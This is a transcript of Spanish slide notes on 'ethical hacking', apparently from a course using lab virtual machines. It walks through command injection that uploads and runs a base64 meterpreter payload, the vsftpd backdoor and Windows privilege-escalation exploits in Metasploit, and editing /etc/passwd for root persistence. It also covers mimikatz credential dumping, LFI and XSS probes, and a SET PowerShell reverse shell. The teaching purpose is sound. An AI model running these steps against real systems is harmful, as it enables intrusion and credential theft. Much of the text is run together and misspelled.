Haking Etico

17
HAKING ETICO [email protected] www.modem.ie descargar maquians virtuales

description

Breve descripciñon de los conceptos

Transcript of Haking Etico

Page 1: Haking Etico

HAKING ETICO

[email protected]

www.modem.ie descargar maquians virtuales

Page 2: Haking Etico

Zabbix -> monitorizacion tipo nagios

Auditoría de Seguridad

Footprint: HerramientasLa biblia del footprintitngAnubishttp://pastebin.com/

url facebook program firefoxpipi agenda

http://www.exploit-db.com/http://www.exploit-db.com/ghdb/3999/

Fingerprint: Ir a los servidores de la empresa y analizar que servicios ofrecen, version software,.. Se pude engañar a las herramientas. Antifingerprint (no suele ser lo habitual).

Análisis vulnerabilidad sobre lo obtenido del fingerprint

Explotación vulnerabilidades

Informes

Webs interesantes Google hackinghttp://www.e-fense.com/.listing

Vemos contenido del directorio

.bash_history

Bing hacking

IP:87.98.225.244

Hosting compartido, no es una buena práctica

Netcraft: análisis dominios,..

http://www.shodanhq.com/ Busca máquinas

Análisis vulnerabilidades -> Metaexploit

Exploit: programa que sabe aprovecharse de un fallo

Badstore.net distribución con vulnerabilidades para testear

Page 3: Haking Etico

MAQUINA METAEXPLOIT

Command Injection

sacando un 404 (not fount) nos dirá el S.O.nmap -O -p 80 -sV 192.168.56.102

Nos saca que es un linuxpodemos concatenar comandos en la caja de texto;echo "Hola"

con el comando w nos die quien somos, normalmente www-data

Vamos a intentar coger el control de la maquina:Opcion1: con wget podemos decargar un fichero al directorio donde estamos;wget ....

Opcion2: Generar payload (codigo ejecutable) lo subimos en base64 a la maquina remota, lo pasamos a binario y lo ejecutamosCon metaexploit generamos este código que ejecuta un mterpreter para linuxEl código está en base64

;echo "dada5d454d8sad3a1d3as4d8---" >/tmp/taes;ls -l /tmp(tendremos el fichero)

Transformamos el bse64 a binario:;cat /tmp/taes | base64 -d > /tmp/taes.bin(no tenemos permiso de ejeccion)

;chmod 755 /tmp/taes.bin(Tenemos un binario subido a la maquina y con permisos)

Configuramos con metaexploit para que el paylod se nos conecte ejecutamos el taes.bin

En el metaexploit ya tenemos una consola con comandos del meterpreter con permisos limitadosgetuid(nos dice que es el 33 - www-data)

Recopilacion de información de ese sistemaVer página web y sacar info de los php

Con la info del nmap anterior podemos ver la info del apache, buscar más puertos:ftp, ssh, telnet, smtp, dns,....sacamos info del sshnmap -O -p 21,22 -sV 192.168.56.102

Page 4: Haking Etico

metaexploit buscamos vulnerabilidades> search openssh 4.7

Buscamos en google: vsftp 2.4.3 exploit

>use exploit/unix/ftp/vsftp_2_4_3_backdoor>set RHOST 192.168.56.102>set payload cmd/unix/..>exploit

Ya estamos dentro con una shell y somos rootidroot@sofi01:~# iduid=0(root) gid=0(root) groups=0(root)

Para asegurar permisos al otro usuario:Cambiamos el 33 en el /etc/password por 0 y reiniciando somos rootCreamos un usuairo con id 0

Page 5: Haking Etico

Vulnerabilidad LFI

Acceso ficheros locales

OWASP - ZAP

Navegador -> Proxy Ponemos IP puerto de ZAP

En el ZAP vemos las cabeceras que se están enviando a la web

Con SSL se complica.

¿Por qué ocurre?

PHP:include $_GET[param]

url:.........../../../../etc/password

Podemo ver el contenido

Saltar proteccion byte null: Que nos pongan una extensión en el ficherourl:.........../../../../etc/password%00

Page 6: Haking Etico

OPEN DIRECTORY - BROWSING DIRECTORY

192.168.56.102/multididae/documentacion

Acceso a los ficheros -> Nos da información misc configuration

Page 7: Haking Etico

CROSS SITE SCRIPTING - XSS

Ataque al usuario a través del servidor

Manipulamos una url para que cuando el usuario acceda ejecute código js en el navegador del usuario para por ejemplo enviar cookies, ..

Para ver si es vulnerable a esto:

Página ds lookup:

;<scritp>alert(1)</script>

Le hemos pasado un parámetro

Cómo le pasamos el parámetro al usuario:http://dasñdmñsmdlas..../parametro=<script>alert(1)</script>

Page 8: Haking Etico

OPEN REDIRECT

Le pasamos a la urlhttp://añmaddasd/google.com

https://www.google.com.sl/search?source=&q=www.elladodelmal.com&btnI=

Page 9: Haking Etico

EXPLOITS

- Buffer overflow- Integer overflow....

Exploitdb: Nos da la aplicación vulnerable y el sploitHemos de fijarnos en el target que nos da las características del equipo que ha de tener la vulnerabilidad

Demo: Kolibri

Metaexploit kali:

Modules -> /usr/share/metasploit-framework/modules/exploits/(Plataformas)....

msfcliKali -> SystemServices -> metaexploit -> startmsfconsole

Recargar modulosreload_alluse exploit/window/http/33790show optionsinfo -> saca datos del exploitset RHOST IPset PAYLOAD windows/meterprter/reverseset LHOST IP Maquina que devolverá el controlexploit

getuid(nos dice el usuario)

Nos devuelve una consola en el host remoto

Cuando es reverse le configuramos con lhost la ip a la que tiene que volver (túnel inverso)En el caso de bind (directo) nos esperará en un puerto

Si queremos hacer escala de privilegios>use exploit/windows/local/bypasuac

podemos lanzar el exploit de ambito local por la sesión que hemos abierto previamente>sessions

>set PAYLOAD win../meter/inver_tcp>set LH...

Page 10: Haking Etico

Si el usuario no pertenece al grupo administradores puede fallar

bypassuac es como evitar la ventana de ejecutar como administrador

use exploit/windows/local/ms14_058_track_popup_set SESSION 4set PAYLOAD...set LHOST ..exploit

Conseguimos elevación privilegios system

En la consola de meterpreter podemos cargar módulos:>load mimekatz

Nos carga el comando wdigest con el que podemos ver las contraseñas en plano ya que windws cachea las credenciales (proeso lsass)

Armitage -> Interfaz gráficaKali -> Explotation tools -> Network explotation -> Armitage

con session -i numero nos podemos conectar a sesiones que tengamos abiertas

Page 11: Haking Etico
Page 12: Haking Etico
Page 13: Haking Etico
Page 14: Haking Etico

setoolkit

podemos generar un script en poweshell para hacer un meterpreter y que se conecte a nuestro equipo cuando se ejecute en la máquina

Opción 1-> 9 -> 1

Page 15: Haking Etico

Nos pide datos:

Page 16: Haking Etico

El código que nos devuelve lo copiamos en la poweshell destino